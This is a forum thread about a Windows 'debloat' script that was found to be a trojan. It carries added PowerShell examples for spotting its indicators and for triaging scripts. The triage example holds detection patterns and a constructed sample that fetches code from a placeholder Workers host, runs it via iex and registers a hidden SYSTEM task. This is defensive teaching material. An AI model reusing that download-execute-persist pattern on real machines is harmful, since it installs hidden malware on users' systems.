
Popular Windows tweak/privacy/debloat tool turned out to be a trojan.

GoodBytes

Delivered via GitHub, the popular Windows tweak tool that promised to offer privacy, debloat the system, and offer system tweaks, including adding the Google Play Store to Android, turned out to be a Trojan.

 

Named Windows Toolbox, and now removed from GitHub, it has been found to deliver more than expected on users' PCs: it adds malware to the system.


bleepingcomputer.com reports:

Quote

Once tech sites discovered the script, it was quickly promoted and installed by many.

However, unbeknownst to everyone until this week, the Windows Toolbox was actually a Trojan that executed a series of obfuscated, malicious PowerShell scripts to install a trojan clicker and possibly other malware on devices.

Over the past week, various users shared the discovery that the Windows Toolbox script was a front for a very clever malware attack, leading to a surprisingly low-quality malware infection.

While the Windows Toolbox script performed all of the features described on GitHub, it also contained obfuscated PowerShell code that would retrieve various scripts from Cloudflare workers and use them to execute commands and download files on an infected device.

 

In summary, the way it worked is by taking advantage of Cloudflare's special header support to fetch scripts that the author distributes. The scripts acquired by the tool are all obfuscated in the source code, so anyone without a keen eye, or without a complete understanding of the various languages used in this project, can't quickly detect that something is not right. The effect is not visible to the user right away. It leverages the Windows Task Scheduler to execute admin-level scripts that do their damage later on.

 

The following Task Scheduler items were found to be part of this trojan:

Quote

Microsoft\Windows\AppID\VerifiedCert
Microsoft\Windows\Application Experience\Maintenance
Microsoft\Windows\Services\CertPathCheck
Microsoft\Windows\Services\CertPathw
Microsoft\Windows\Servicing\ComponentCleanup
Microsoft\Windows\Servicing\ServiceCleanup
Microsoft\Windows\Shell\ObjectTask
Microsoft\Windows\Clip\ServiceCleanup

 

It also creates a hidden folder 'systemfile' on the C:\ partition and reroutes the Chrome, Edge and Brave web browser user profiles there.

It also injects malicious Google Chrome / Chromium extensions into these web browsers. In addition, it reroutes web traffic to a variety of malicious sites.

 

GitHub has removed the project.

 

Source:

https://www.bleepingcomputer.com/news/security/windows-11-tool-to-add-google-play-secretly-installed-malware/

 

This highlights that you can't just blindly run scripts or programs from online, even if they are open source, unless you have personally vetted the source code properly and fully understand what the program or script will do.

 

There is also a lot of misinformation and myth going around about "debloating" and "privacy" tools.

Not going into specifics, but "debloating" doesn't gain you anything besides saving a few MBs of space on your drive out of your TB drive, or whatever drive capacity you have plenty of, unless you screwed up and didn't get the right drive for your needs, or your budget limited you to a drive capacity that is barely enough and you need every single MB you can get. And many times, scripts or programs just remove, or encourage you to remove, everything in some way, and that breaks one's OS experience. For example, removing the Store, ignoring the fact that some components of the OS and add-ons like video codecs are distributed via the Store, and some can sometimes be prerequisites for an OS update to install properly.

 

You want to save space? No problem! Just know carefully what you'll be removing and what impact, if any, it may have.

 

Many freak out over Microsoft telemetry data, with many having wrong assumptions because they are reading click-bait articles instead of the source: the Microsoft Windows Privacy Policy, which covers all included OS apps like Edge, OneDrive and the Store, and features like "Find my PC". That said, I understand people wanting to turn it off, and I am all for options.

 

That said, many of these scripts I have found over the years only set a registry value to 0 for a flag in the registry, thinking it means "disabled", as "0" tends to mean "off/disabled" in there, but that is wrong. There is no "off": 0 is a level of telemetry collection which only works on Enterprise editions of Windows connected to a domain. If you put 0 on an unsupported edition of Windows, or on Enterprise but not domain-joined, then it will assume 1 in reality, as you can read here: https://docs.microsoft.com/en-us/windows/privacy/configure-windows-diagnostic-data-in-your-organization. And this is a problem, as it gives the illusion of a privacy gain, but in reality that is not the case. And that is the problem I want to highlight.

 

Many of these tools and scripts, maybe even from known companies (I didn't test them to confirm, so I'm not saying that they aren't working), typically are not carefully vetted features that have been validated. They just collect stuff they find online, put a nice GUI on it and call it a day. Or some of the features used to work in the early days of Windows 10, and are assumed to continue to work today. That is my point.

 

Even in the open source projects I have seen, none have validation tests in them to confirm whether things are working or not. They just do stuff to the system and hope that what they found online is correct today, if it ever was.

 

Point is, it's best to do it all yourself and read the documentation before doing things in the registry.
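A read-only triage pass for the indicators the post above lists (the scheduled task names, the hidden C:\systemfile folder, the browser profile redirection), and for the "checked on task scheduling and searched hidden folders" check a later reply describes. This is an added example; it is not code from the original post or from the Windows Toolbox project. The task names and the folder path come from the post. The assumption that profile redirection would show up as --user-data-dir / --load-extension flags on browser shortcuts or running browser processes is mine and is labelled in the code. Run it from an elevated PowerShell session; it changes nothing.

```powershell
# Added example (not from the original post or the Windows Toolbox project):
# looks for the indicators listed in the thread and prints what it finds.
# Task names and C:\systemfile come from the post; the browser-flag check is
# an assumption of mine about how the profile redirection was done.

$SuspectTasks = @(
    '\Microsoft\Windows\AppID\VerifiedCert',
    '\Microsoft\Windows\Application Experience\Maintenance',
    '\Microsoft\Windows\Services\CertPathCheck',
    '\Microsoft\Windows\Services\CertPathw',
    '\Microsoft\Windows\Servicing\ComponentCleanup',
    '\Microsoft\Windows\Servicing\ServiceCleanup',
    '\Microsoft\Windows\Shell\ObjectTask',
    '\Microsoft\Windows\Clip\ServiceCleanup'
)
$SuspectFolder = 'C:\systemfile'
$Browsers      = 'chrome.exe', 'msedge.exe', 'brave.exe'
$findings      = @()

# 1. Scheduled tasks. The names sit under real Microsoft task folders, so match on
#    the full path and print the task action so the command line can be judged.
foreach ($full in $SuspectTasks) {
    $folder = (Split-Path $full -Parent) + '\'   # Get-ScheduledTask wants a trailing backslash
    $name   = Split-Path $full -Leaf
    $task   = Get-ScheduledTask -TaskPath $folder -TaskName $name -ErrorAction SilentlyContinue
    if ($task) {
        $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join ' ; '
        $findings += [pscustomobject]@{ Type = 'ScheduledTask'; Where = $full; Detail = $actions }
    }
}

# 2. Hidden folder on the system drive (-Force is needed to see hidden items).
if (Test-Path -LiteralPath $SuspectFolder) {
    $item = Get-Item -LiteralPath $SuspectFolder -Force
    $findings += [pscustomobject]@{ Type = 'Folder'; Where = $SuspectFolder; Detail = "Attributes: $($item.Attributes)" }
}

# 3. Browser redirection (ASSUMPTION: done via command-line flags). Check running
#    browser processes and .lnk shortcuts for --user-data-dir / --load-extension
#    values that point into the suspect folder.
$flagPattern = '--(user-data-dir|load-extension)=?\s*"?[^"\s]*systemfile'

$findings += Get-CimInstance Win32_Process |
    Where-Object { $Browsers -contains $_.Name -and $_.CommandLine -match $flagPattern } |
    ForEach-Object {
        [pscustomobject]@{ Type = 'Process'; Where = "$($_.Name) (PID $($_.ProcessId))"; Detail = $_.CommandLine }
    }

$shortcutDirs = @(
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('CommonDesktopDirectory'),
    [Environment]::GetFolderPath('StartMenu'),
    [Environment]::GetFolderPath('CommonStartMenu'),
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
) | Where-Object { $_ -and (Test-Path -LiteralPath $_) }

if ($shortcutDirs) {
    $shell = New-Object -ComObject WScript.Shell
    $findings += Get-ChildItem -LiteralPath $shortcutDirs -Filter *.lnk -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $lnk = $shell.CreateShortcut($_.FullName)
            if ($lnk.Arguments -match $flagPattern) {
                [pscustomobject]@{ Type = 'Shortcut'; Where = $_.FullName; Detail = "$($lnk.TargetPath) $($lnk.Arguments)" }
            }
        }
}

if ($findings.Count -eq 0) { 'No Windows Toolbox indicators found.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

A task hit is worth reading closely even if the action looks like a normal powershell.exe invocation: the point of putting the tasks under Microsoft\Windows\... was to blend in, so judge the arguments, not the folder. A clean run of this script only means these specific indicators are absent; the post itself says the payload was fetched at runtime, so what it delivered can differ from machine to machine.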

 
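The registry point made above, that AllowTelemetry=0 is only honoured on some editions and otherwise behaves as 1, as an added example of how to check what a host is actually configured for. This is my code, not from the post. The edition mapping follows the Microsoft page linked above (the Security/off level is listed for Enterprise, Education and Server editions); the script checks the edition only and does not check domain membership, which the post also mentions. The second registry path is where the Settings app writes the value and is an assumption on my part.

```powershell
# Added example, not from the original post: report the AllowTelemetry policy value
# and what it effectively means on this edition, per the Microsoft page linked above.
# ASSUMPTION: the edition regex below is my reading of that page; the second key is
# where the Settings app stores the user's choice.

$policyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection'
$defaultKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection'
$levels     = @{ 0 = 'Security (off)'; 1 = 'Required / Basic'; 2 = 'Enhanced'; 3 = 'Optional / Full' }

function Get-TelemetryPolicyValue {
    # The Group Policy key wins over the Settings-app key, so check it first.
    foreach ($key in $policyKey, $defaultKey) {
        $v = Get-ItemProperty -Path $key -Name AllowTelemetry -ErrorAction SilentlyContinue
        if ($null -ne $v) {
            return [pscustomobject]@{ Source = $key; Value = [int]$v.AllowTelemetry }
        }
    }
    return $null
}

$edition   = (Get-CimInstance Win32_OperatingSystem).Caption
$supports0 = $edition -match 'Enterprise|Education|Server'   # editions where level 0 exists
$setting   = Get-TelemetryPolicyValue

if ($null -eq $setting) {
    "No AllowTelemetry value set; Windows uses its default for: $edition"
} else {
    $effective = $setting.Value
    if ($setting.Value -eq 0 -and -not $supports0) { $effective = 1 }   # 0 falls back to 1 here

    "Edition:   $edition"
    "Policy:    AllowTelemetry=$($setting.Value) ($($levels[$setting.Value])) from $($setting.Source)"
    "Effective: $effective ($($levels[$effective]))" +
        $(if ($effective -ne $setting.Value) { '   <-- level 0 is not honoured on this edition' })
}
```

This is the check a "privacy" script should perform before claiming it turned telemetry off: if the edition line says Home or Pro and the policy line says 0, the effective line will say 1, which is exactly the illusion the post describes.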


Until this post I had never heard of said piece of software.

 

I tried a few times to debloat it manually using PowerShell [in a VM], but the .bat script I created destroyed the VM instead, due to removing too many of the programs.

 

hardware
cpu: ryzen 9 5900x
GPU: ASUS strix LC RX6800xt
motherboard: asus crosshair Formula VIII
memory: CMW32GX4M2Z3600C18
SSD: Samsung 980 PRO 1TB
PSU: Corsair RM850x 850W
CPU cooler: be quiet! PURE LOOP 360mm
Case: Thermaltake Core X71
HDD: 2TB and 6TB HDD
Front IO: LG blu-ray drive & 3.5" card reader [through a 5.25 to 3.5 bay]
OS: Windows 10 PRO

 


The only way you'll know if Windows 10 has been debloated is if almost every feature is seriously broken or non-existent to the point of it being borderline Windows 95. Basically almost everything in the OS should be made up of broken directory links that go nowhere. Then it's good to go lol


This pleases me.

mY sYsTeM iS Not pErfoRmInG aS gOOd As I sAW oN yOuTuBe. WhA t IS a GoOd FaN CuRVe??!!? wHat aRe tEh GoOd OvERclok SeTTinGS FoR My CaRd??  HoW CaN I foRcE my GpU to uSe 1o0%? BuT WiLL i HaVE Bo0tllEnEcKs? RyZEN dOeS NoT peRfORm BetTer wItH HiGhER sPEED RaM!!dId i WiN teH SiLiCON LotTerrYyOu ShoUlD dEsHrOuD uR GPUmy SYstEm iS UNDerPerforMiNg iN WarzONEcan mY Pc Run WiNdOwS 11 ?woUld BaKInG MY GRaPHics card fIX it? MultimETeR TeSTiNG!! aMd'S GpU DrIvErS aRe as goOD aS NviDia's YOU SHoUlD oVERCloCk yOUR ramS To 5000C18

 


I am not surprised that stuff like this is happening. I had to de-bloat my Windows laptop yesterday and find a reputable program. I usually do my own research or listen to what an expert has to say to reduce risk. A lot of the de-bloat programs are sketchy and I doubt people go through and look at the code. The YouTuber Mental Outlaw reviewed a de-bloater that I used previously, so I would recommend looking him up.


47 minutes ago, emosun said:

The only way you'll know if windows 10 has been debloated is if almost every feature is seriously broken or non existent to the point of it being borderline windows 95. Basically almost everything in the os should be made up of broken directory links that go nowhere. Then it's good to go lol

This is kind of what I did.

I broke lots of stuff debloating the OS.

I completely removed everything I could, so no Microsoft Store or Xbox stuff and other crap on my system 😄

 

I "upgraded" from Windows 7 this year.

The UI and user experience is still superior on 7.

A PC Enthusiast since 2011
AMD Ryzen 7 5700X@4.65GHz | GIGABYTE GTX 1660 GAMING OC @ Core 2085MHz Memory 5000MHz
Cinebench R23: 15669cb | Unigine Superposition 1080p Extreme: 3566

12 minutes ago, RejZoR said:

This wouldn't have happened if OS wasn't so full of absolute trash no one asked for. This is literally problem that Microsoft itself created with their arrogance and incompetence.

This was something done for years. Even back in the XP days.

People removed Calculator and Notepad and such, because "it's not gaming related". So, I disagree.

And again, all you are doing is saving a few MBs of drive space (make that KBs in the XP days, but that was relative to the drive capacity of the time).

 

Also, under Windows 11, most apps are installed on demand (when you first click on them).

So they are "installed" but not really.

 


1 hour ago, GoodBytes said:

Also, under Windows 11, most apps are installed on demand (when you first click on them).

So they are "installed" but not really.

There is a lot of stuff that comes installed: Edge, Xbox stuff, Microsoft Store, Cortana, telemetry, etc.


2 hours ago, emosun said:

The only way you'll know if windows 10 has been debloated is if almost every feature is seriously broken or non existent to the point of it being borderline windows 95. Basically almost everything in the os should be made up of broken directory links that go nowhere. Then it's good to go lol

yea! when I installed LTSC all it did was make a bunch of folders on my drive!

didn't even format the bloody thing!

 

In all seriousness, if it's open source, have a look at the code. Even if you don't speak programmer, it's still a good idea to figure out what it's doing BEFORE you run it on your system.

*Insert Witty Signature here*

System Config: https://au.pcpartpicker.com/list/Tncs9N
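One way to do the "look at the code before you run it" pass described above, as an added example that is not code from the thread or from Windows Toolbox. It is a static grep-style triage: it flags the constructs the first post reports (obfuscated PowerShell, scripts fetched from Cloudflare Workers at runtime, scheduled-task persistence, browser profile redirection) with the line they appear on, so a reader who "doesn't speak programmer" knows which lines to ask about. The sample script it scans when no path is given is constructed for the demo and uses a placeholder host name; a hit is a reason to read that line, not proof of malice.

```powershell
# Added example, not from the thread or from Windows Toolbox: static triage of a
# script before running it. Usage: .\Test-ScriptSmells.ps1 -Path .\tool.ps1
# With no -Path it scans a CONSTRUCTED sample (below) that mimics the patterns
# the first post describes; 'example-worker' is a placeholder, not a real host.
param([string]$Path)

# Each pattern is a reason to read the matching line, not a verdict.
$Patterns = [ordered]@{
    'Invoke-Expression / iex'          = '\b(Invoke-Expression|iex)\b'
    'Base64 payload'                   = 'FromBase64String|-EncodedCommand|[A-Za-z0-9+/]{60,}={0,2}'
    'Remote fetch at runtime'          = 'DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\b(iwr|irm|curl|wget)\b'
    'Cloudflare Workers host'          = 'workers\.dev'
    'Scheduled-task persistence'       = 'schtasks(\.exe)?\s+/create|Register-ScheduledTask'
    'Hidden window / hidden file'      = '-WindowStyle\s+Hidden|-w\s+hidden\b|attrib\s+\+h'
    'String obfuscation'               = '\[char\]\s*\d+|\.Replace\(|-join\b'
    'Browser profile / extension flag' = '--user-data-dir|--load-extension'
}

function Find-ScriptSmells {
    param([string[]]$Lines)
    $hits = @()
    for ($i = 0; $i -lt $Lines.Count; $i++) {
        foreach ($name in $Patterns.Keys) {
            if ($Lines[$i] -match $Patterns[$name]) {
                $snippet = $Lines[$i].Trim()
                if ($snippet.Length -gt 90) { $snippet = $snippet.Substring(0, 90) + '...' }
                $hits += [pscustomobject]@{ Line = $i + 1; Smell = $name; Text = $snippet }
            }
        }
    }
    return $hits
}

if ($Path) {
    $lines = Get-Content -LiteralPath $Path
} else {
    # CONSTRUCTED sample: one harmless "debloat" line, then the shape of what the post
    # describes (runtime fetch from a Workers host, decode + iex, hidden scheduled task).
    $lines = @'
Get-AppxPackage *Xbox* | Remove-AppxPackage
$u = 'https://' + 'example-worker' + '.workers.dev/x'
$p = (New-Object Net.WebClient).DownloadString($u)
iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($p)))
schtasks /create /tn "\Microsoft\Windows\Servicing\ComponentCleanup" /tr "powershell -w hidden -c ..." /sc minute /mo 30 /ru SYSTEM
'@ -split "`r?`n"
}

$hits = Find-ScriptSmells -Lines $lines
if ($hits.Count -eq 0) { 'No obvious smells found; still read the whole script before running it.' }
else { $hits | Sort-Object Line | Format-Table -AutoSize -Wrap }
```

Line 1 of the sample is what a debloater is expected to do and produces no hit; lines 2 to 5 each trip at least one pattern. That split is the point: a legitimate tweak script has no reason to fetch code at runtime, decode it and hand it to iex, or to register a hidden task under a Microsoft folder, so those lines are where to spend the reading time.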

 


Thought this was WindowsDebloater at first, but I checked on task scheduling and searched hidden folders and my system seems to be in the clear.

 

The best gaming PC is the PC you like to game on, how you like to game on it


15 hours ago, Vishera said:

There are a lot of stuff that come installed: Edge,XBOX stuff,Microsoft Store,Cortana,Telemetry,etc.

Well, Edge is needed. Even Linux distros include a web browser of some kind.

 

The Store is needed as well. It maintains built-in applications, fetches video codecs as needed, and updates some OS components without going through Windows Update (which is often blocked by IT so it can be controlled; in these situations you have IT staff who think they magically know more than Microsoft and decide what to release or not, and then issues arrive and get blamed on Microsoft, because they are perfect and clearly know Windows better than Microsoft).

 

Cortana. Yes, I agree. And there's no reason why it can't be uninstalled, especially today when Cortana is gone, with all its features disabled/removed.

So why the app? Under Windows 11, it can be uninstalled via winget (winget uninstall Cortana), but why isn't it doable via the Installed Apps section / right-click > Uninstall? I can understand it was missed at the Windows 11 release, being rushed, but it's still not the case under the Insider program, to my knowledge.

 

OneDrive, well, I guess it should be an option at startup. But considering that most people have Office 365, which does have OneDrive integration, there is a good chance that it is being used by most.

 

Xbox, sure. But that isn't running in the background. If you don't use it, well, it's a few MB of drive space saved.


3 minutes ago, GoodBytes said:

Well, Edge is needed. Even Linux distros include a web browser of some kind.

I downloaded a different browser and got rid of it. 

Also, Internet Explorer is still there (it's easy to enable it), so it can be used to download the browser of your choice.

4 minutes ago, GoodBytes said:

The Store is needed as well. It maintain built-in applications,

I removed those 😄

4 minutes ago, GoodBytes said:

fetches video codecs as needed, and updates some OS components

You can do that through the Windows Update service.

In fact, I downloaded a language pack that way without the Store.


19 minutes ago, Vishera said:

I downloaded a different browser and got rid of it. 

Hehe.

 

19 minutes ago, Vishera said:

Also, Internet Explorer is still there (it's easy to enable it), so it can be used to download the browser of your choice.

I removed those 😄

You can do that through the Windows Update service.

In fact, I downloaded a language pack that way without the Store.

Well, IE is no longer part of Windows 11. If you check under Settings or the Optional Features panel, it's not there under Windows 11.

All you have is "Internet Explorer Mode", which requires Edge to be installed: it is Chromium Edge, but it offers the ability to switch the engine to IE on select pages, and it comes with limitations compared to the real IE. This add-on is 281KB. It is not installed by default.

 

The Store delivers updates to language packs, and they are mainly updates for typos and explanation improvements. Granted, for English and other major global languages that is less of a concern, but some members here can share the issues they noticed in their languages. I recall a few complained.


3 hours ago, Vishera said:

I "upgraded" from Windows 7 this year.

The UI and user experience is still superior on 7.

Same.

I only use 10 because 7 doesn't work on the newer machine I bought, but it's Windows 10 Ameliorated. But yeah, Windows 7 is still much better than stock 10. Although 10 on my new machine is so empty it's pretty similar to 7, and pretty snappy, all things considered.


Welp, it seems it's always better to do most things manually if you're not sure about certain programs. Shame these are even needed.

| Ryzen 7 7800X3D | AM5 B650 Aorus Elite AX | G.Skill Trident Z5 Neo RGB DDR5 32GB 6000MHz C30 | Sapphire PULSE Radeon RX 7900 XTX | Samsung 990 PRO 1TB with heatsink | Arctic Liquid Freezer II 360 | Seasonic Focus GX-850 | Lian Li Lanccool III | Mousepad: Skypad 3.0 XL / Zowie GTF-X | Mouse: Zowie S1-C | Keyboard: Ducky One 3 TKL (Cherry MX-Speed-Silver)Beyerdynamic MMX 300 (2nd Gen) | Acer XV272U | OS: Windows 11 |


Quote

What we know is that the malicious scripts only targeted users in the US and created numerous Scheduled Tasks with the following names:

Anyone know why this is the case? I mean, from what I can tell this trojan was used essentially to generate revenue from affiliate links, so why just the US?

"A high ideal missed by a little, is far better than low ideal that is achievable, yet far less effective"

 

If you think I'm wrong, correct me. If I've offended you in some way tell me what it is and how I can correct it. I want to learn, and along the way one can make mistakes; Being wrong helps you learn what's right.


16 hours ago, GoodBytes said:

For example, removing the Store, ignoring the fact that some components of the OS and add-ons like video codecs are distributed via the Store, and some can sometimes be prerequisites for an OS update to install properly.

 

I think I don't need the Microsoft store to just download codecs when I could just download the latest K-Lite codec pack and be done with it.


Debloater scripts are always begging for trouble. Like, yeah, Microsoft can be a bit annoying with all their Edge/OneDrive shit sometimes but these scripts are genuinely responsible for, like, 90% of Windows problem reports online, I swear. (Stop trying to remove the fucking Microsoft Store and getting mad when the Xbox app doesn't work anymore, you goddamn idiots.)

 

The telemetry isn't that bad guys, I swear.


15 hours ago, emosun said:

Same.

I only use 10 because 7 doesn't work on the newer machine I bought, but it's Windows 10 Ameliorated. But yeah, Windows 7 is still much better than stock 10. Although 10 on my new machine is so empty it's pretty similar to 7, and pretty snappy, all things considered.

I've been using W7 since 2014 with the same CPU, and my use of such a system hasn't given me any reason to "upgrade" to W10 or 11.

W7 is simply easy to use, much less intrusive, and has no shitload of useless apps. The only hardware that's been upgraded, in 2018, is from a GTX 780 to a 1080 Ti, and today it's still going good. I'm literally like: if it works, don't fix (or change) it. Even my sister likes my PC with W7 more than their laptops with W10 lol

DAC/AMPs:

Klipsch Heritage Headphone Amplifier

Headphones: Klipsch Heritage HP-3 Walnut, Meze 109 Pro, Beyerdynamic Amiron Home, Amiron Wireless Copper, Tygr 300R, DT880 600ohm Manufaktur, T90, Fidelio X2HR

CPU: Intel 4770, GPU: Asus RTX3080 TUF Gaming OC, Mobo: MSI Z87-G45, RAM: DDR3 16GB G.Skill, PC Case: Fractal Design R4 Black non-iglass, Monitor: BenQ GW2280


On 4/16/2022 at 10:42 PM, Arika S said:

This will always be a major downside of open-source software, everyone can check the code, so people assume others have checked it to make sure it's not malicious.

I think this malware relied on the (understandable) laziness of people not actually checking the scripts to see whether they were malicious in the first place. It worked for the perpetrators for a while, until months later, when smarter people discovered malicious code within the software.

 

The malware would have stayed for much longer if it were proprietary, however.

 

I'm also pretty sure the people who download this "Windows debloater" software are just novices who don't understand how to actually set up Windows correctly either. They are easier targets than power users.

 

Also, I'm pretty sure most power users won't migrate to Windows 11 too early.


When both ways destroy your OS, try it manually or from others.

But it will still break features that Microsoft has hard-wired into other systems.

 

Glad I didn't use any of them, but some of them seemed interesting. Some are not just trying to remove MBs of data, but also to remove useless or data-collection software. Then again, as said before, some are just hard-wired in, so you need a better solution to deal with some of them. Also, Microsoft is just going to re-add a lot of stuff when updating your OS again. Having a manual "debloat" script does sound nice though, if one would be able to adjust it for better security too.

On 4/16/2022 at 2:38 PM, Error 52 said:

The telemetry isn't that bad guys, I swear.

That is what a western spy would say! 😛

Edited by Quackers101

13 hours ago, Grand Admiral Thrawn said:

Trust, but verify.

And let's not forget that the alternative is "trust, with no way of verifying".

I will rather take "the ability for someone to verify that the code is safe" over "nobody has the ability to verify it".

 

 

Anyway, my take is that if Microsoft implemented these features themselves rather than push people to use third party tools then this would not have happened. 

